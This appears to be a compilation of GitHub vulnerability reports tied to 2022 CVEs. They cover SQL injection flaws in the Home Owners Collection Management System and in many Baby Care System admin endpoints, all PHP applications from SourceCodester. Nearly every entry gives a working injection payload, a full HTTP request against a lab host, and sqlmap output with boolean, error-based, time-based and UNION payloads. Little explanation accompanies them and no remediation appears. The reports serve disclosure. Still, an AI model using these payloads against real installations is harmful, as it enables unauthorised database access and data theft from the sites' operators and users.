Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via /hocms/classes/Master.php?f=delete_phase.

Permalink

Cannot retrieve contributors at this time

**Home Owners Collection Management System has SQL injection vulnerability**

vendor : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html

Vulnerability file: /hocms/classes/Master.php?f=delete\_phase

Vulnerability location: /hocms/classes/Master.php?f=delete\_phase,id

\[+\]Payload: id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /hocms/classes/Master.php?f=delete_phase HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/hocms/admin/?page=phases
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=1' RLIKE (SELECT (CASE WHEN (3093=3093) THEN 1 ELSE 0x28 END))-- TVaW
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9655 FROM(SELECT COUNT(\*),CONCAT(0x716a787a71,(SELECT (ELT(9655\=9655,1))),0x71786a7071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- rFkx

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=1' AND (SELECT 5645 FROM (SELECT(SLEEP(5)))IsZT)-- rkXc
\---

CVE-2022-28417: bug_report/SQLi-4.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/uesrs.php&action=type&userrole=User&userid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/uesrs.php&action=type&userrole=User&userid=

![image](https://user-images.githubusercontent.com/54017627/161356789-ddde867a-52c8-4dfc-831e-a59cf9d49c36.png)

Vulnerability location: /BabyCare/admin.php?id=users&action=type&userrole=User&userid=1 //uesrid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=users&action=type&userrole=User&userid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //userid is Injection point

GET /BabyCare/admin.php?id\=users&action\=type&userrole\=User&userid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161356877-97aa81d0-2ef7-4696-80fe-20af0b6bfd08.png)

\--\-
Parameter: userid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=users&action\=type&userrole\=User&userid\=1' RLIKE (SELECT (CASE WHEN (4612=4612) THEN 1 ELSE 0x28 END))-- Wlmz
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=users&action=type&userrole=User&userid=1' AND EXTRACTVALUE(3489,CONCAT(0x5c,0x7170767671,(SELECT (ELT(3489\=3489,1))),0x71787a6271))\-- THEv

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=users&action\=type&userrole\=User&userid\=1' AND (SELECT 1342 FROM (SELECT(SLEEP(5)))LPbX)-- UTgs
\---

![image](https://user-images.githubusercontent.com/54017627/161356928-717b132b-f532-4016-8e2f-75410e578a94.png)

CVE-2022-28438: bug_report/SQLi-20.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/pagerole.php&action=display&value=1&roleid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/pagerole.php&action=display&value=1&roleid=

Vulnerability location: /BabyCare/admin.php?id=pagerole&action=display&value=1&roleid= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=pagerole&action=display&value=1&roleid=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //roleid is Injection point

GET /BabyCare/admin.php?id\=pagerole&action\=display&value\=1&roleid\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: roleid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=pagerole&action\=display&value\=1&roleid\=3' RLIKE (SELECT (CASE WHEN (6967=6967) THEN 3 ELSE 0x28 END))-- nhxC
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=pagerole&action=display&value=1&roleid=3' AND (SELECT 2190 FROM(SELECT COUNT(\*),CONCAT(0x7162627871,(SELECT (ELT(2190\=2190,1))),0x717a766b71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- Gllb

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=pagerole&action\=display&value\=1&roleid\=3' AND (SELECT 4825 FROM (SELECT(SLEEP(5)))FSej)-- xCer
\---

CVE-2022-28425: bug_report/SQLi-6.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&action=delete.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&action=delete

Vulnerability location: /BabyCare/admin.php?id=posts&action=delete&postid=7&image= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=delete&postid=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+&image= //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=delete&postid\=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--+&image= HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&action\=delete&postid\=7' RLIKE (SELECT (CASE WHEN (3209=3209) THEN 7 ELSE 0x28 END))-- pges&image=
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=posts&action=delete&postid=7' AND EXTRACTVALUE(7032,CONCAT(0x5c,0x7170767071,(SELECT (ELT(7032\=7032,1))),0x7171787171))\-- OvNm&image=

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=delete&postid\=7' AND (SELECT 3278 FROM (SELECT(SLEEP(5)))KhCO)-- EGcS&image=
\--

CVE-2022-28423: bug_report/SQLi-4.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/siteoptions.php&social=remove&sid=2.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/siteoptions.php&social=remove&sid=2

![image](https://user-images.githubusercontent.com/54017627/161355498-1ebd5765-a41e-496d-ad08-7c78cfce40ca.png)

Vulnerability location: /BabyCare/admin.php?id=siteoptions&social=remove&sid=2 //sid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=siteoptions&social=remove&sid=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //sid is Injection point

GET /BabyCare/admin.php?id\=siteoptions&social\=remove&sid\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161355323-758b342d-1772-410e-8f49-43541b6ad08f.png)

\--\-
Parameter: sid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=siteoptions&social\=remove&sid\=2' RLIKE (SELECT (CASE WHEN (2073=2073) THEN 2 ELSE 0x28 END))-- VDjh
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=siteoptions&social=remove&sid=2' AND EXTRACTVALUE(4201,CONCAT(0x5c,0x7171716b71,(SELECT (ELT(4201\=4201,1))),0x7162707a71))\-- YSja

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=siteoptions&social\=remove&sid\=2' AND (SELECT 2185 FROM (SELECT(SLEEP(5)))SlaH)-- rcEz
\---

![image](https://user-images.githubusercontent.com/54017627/161355507-a2606a11-a320-4575-a4bf-48745f08b463.png)

CVE-2022-28431: bug_report/SQLi-12.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/pagerole.php&action=edit&roleid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/pagerole.php&action=edit&roleid=

![image](https://user-images.githubusercontent.com/54017627/161354417-66bda321-25ca-4aca-91bc-d90c9c074a33.png)

Vulnerability location: /BabyCare/admin.php?id=pagerole&action=edit&roleid= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=pagerole&action=edit&roleid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //roleid is Injection point

GET /BabyCare/admin.php?id\=pagerole&action\=edit&roleid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161354255-69005e1b-1e0d-4860-b762-0669950e640b.png)

\--\-
Parameter: roleid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=pagerole&action\=edit&roleid\=1' AND 3500=3500 AND 'WSTQ'\='WSTQ

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=pagerole&action\=edit&roleid\=1' AND (SELECT 1894 FROM(SELECT COUNT(\*),CONCAT(0x71766a6a71,(SELECT (ELT(1894=1894,1))),0x71717a7671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'RNhF'\='RNhF

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=pagerole&action\=edit&roleid\=1' AND (SELECT 1574 FROM (SELECT(SLEEP(5)))ajLi) AND 'Muhu'\='Muhu

    Type: UNION query
    Title: Generic UNION query (NULL) \- 4 columns
    Payload: id\=pagerole&action\=edit&roleid\=\-1597' UNION ALL SELECT NULL,CONCAT(0x71766a6a71,0x43596647727573766d505568646d54524c656f76624861765845474c474579724872425466624363,0x71717a7671),NULL,NULL-- -
\---

![image](https://user-images.githubusercontent.com/54017627/161354345-4cf03726-ebc8-489e-ab6c-3fc1ebfd5018.png)

CVE-2022-28426: bug_report/SQLi-7.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&find=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&find=

Vulnerability location: /BabyCare/admin.php?id=posts&find= //find is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&find=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //find is Injection point

GET /BabyCare/admin.php?id\=posts&find\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: find (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&find\=3' RLIKE (SELECT (CASE WHEN (6593=6593) THEN 3 ELSE 0x28 END))-- zXvu
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&find=3' AND (SELECT 3959 FROM(SELECT COUNT(\*),CONCAT(0x7170787071,(SELECT (ELT(3959\=3959,1))),0x7178787171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- IVWt

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&find\=3' AND (SELECT 4643 FROM (SELECT(SLEEP(5)))bafh)-- GSoV
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=posts&find=3' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x65476d614a4d4d69526c636a4e486f436b45485a67484d67736e4e47657a654761684c644d734557,0x7178787171),NULL#
\--\-

CVE-2022-28424: bug_report/SQLi-5.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/inbox.php&action=read&msgid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/inbox.php&action=read&msgid=

![image](https://user-images.githubusercontent.com/54017627/161354868-cc09a2cd-ef2a-4185-a6a9-9c70eb9c0c29.png)

Vulnerability location: /BabyCare/admin.php?id=inbox&action=read&msgid=11 //msgid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=inbox&action=read&msgid=11%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //msgid is Injection point

GET /BabyCare/admin.php?id\=inbox&action\=read&msgid\=11%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161354750-1f5d471f-7c65-4025-b497-b1c04399c8c8.png)

\--\-
Parameter: msgid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=inbox&action\=read&msgid\=11' AND 4681=4681 AND 'xjEi'\='xjEi

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=inbox&action\=read&msgid\=11' AND (SELECT 9382 FROM(SELECT COUNT(\*),CONCAT(0x716b707871,(SELECT (ELT(9382=9382,1))),0x7178787071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'TmlF'\='TmlF

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=inbox&action\=read&msgid\=11' AND (SELECT 7228 FROM (SELECT(SLEEP(5)))cyYg) AND 'PNfI'\='PNfI
\--\-

![image](https://user-images.githubusercontent.com/54017627/161354890-0bdea68d-69f7-4945-a32e-de5c49329d50.png)

CVE-2022-28427: bug_report/SQLi-9.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/inbox.php&action=delete&msgid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/inbox.php&action=delete&msgid=

![image](https://user-images.githubusercontent.com/54017627/161355051-d632b485-255d-4c09-b000-44f36b582768.png)

Vulnerability location: /BabyCare/admin.php?id=inbox&action=delete&msgid=11 //msgid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=inbox&action=delete&msgid=11%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //msgid is Injection point

GET /BabyCare/admin.php?id\=inbox&action\=delete&msgid\=11%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161354945-37f592d9-b9dc-4581-85a1-6e95ed44f521.png)

\--\-
Parameter: msgid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=inbox&action\=delete&msgid\=11' RLIKE (SELECT (CASE WHEN (7743=7743) THEN 11 ELSE 0x28 END))-- sevP
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=inbox&action=delete&msgid=11' AND EXTRACTVALUE(4012,CONCAT(0x5c,0x7178787171,(SELECT (ELT(4012\=4012,1))),0x7176787171))\-- onZM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=inbox&action\=delete&msgid\=11' AND (SELECT 7504 FROM (SELECT(SLEEP(5)))TPJa)-- gsFn
\---

![image](https://user-images.githubusercontent.com/54017627/161355028-8b85f504-b1fe-4fad-8382-790d3e86ef98.png)

CVE-2022-28429: bug_report/SQLi-10.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/siteoptions.php&action=displaygoal&value=1&roleid=1.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/siteoptions.php &action=displaygoal&value=1&roleid=1

![image](https://user-images.githubusercontent.com/54017627/161356210-d3b64f61-2ff2-4b67-b756-b3811bfb987e.png)

Vulnerability location: /BabyCare/admin.php?id=siteoptions&action=displaygoal&value=1&roleid=1 //roleid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=siteoptions&action=displaygoal&value=1&roleid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //roleid is Injection point

GET /BabyCare/admin.php?id\=siteoptions&action\=displaygoal&value\=1&roleid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161356077-5f38e3a3-3487-46f6-b2f5-28b57d560a29.png)

\--\-
Parameter: roleid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=siteoptions&action\=displaygoal&value\=1&roleid\=1' RLIKE (SELECT (CASE WHEN (1355=1355) THEN 1 ELSE 0x28 END))-- hyrZ
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=siteoptions&action=displaygoal&value=1&roleid=1' AND (SELECT 9758 FROM(SELECT COUNT(\*),CONCAT(0x7162787071,(SELECT (ELT(9758\=9758,1))),0x71786a7171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- gGPp

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=siteoptions&action\=displaygoal&value\=1&roleid\=1' AND (SELECT 2161 FROM (SELECT(SLEEP(5)))CrAu)-- SdUW
\---

![image](https://user-images.githubusercontent.com/54017627/161356181-278bf5aa-cd02-448d-99fe-03491a9623b2.png)

Tag

#apple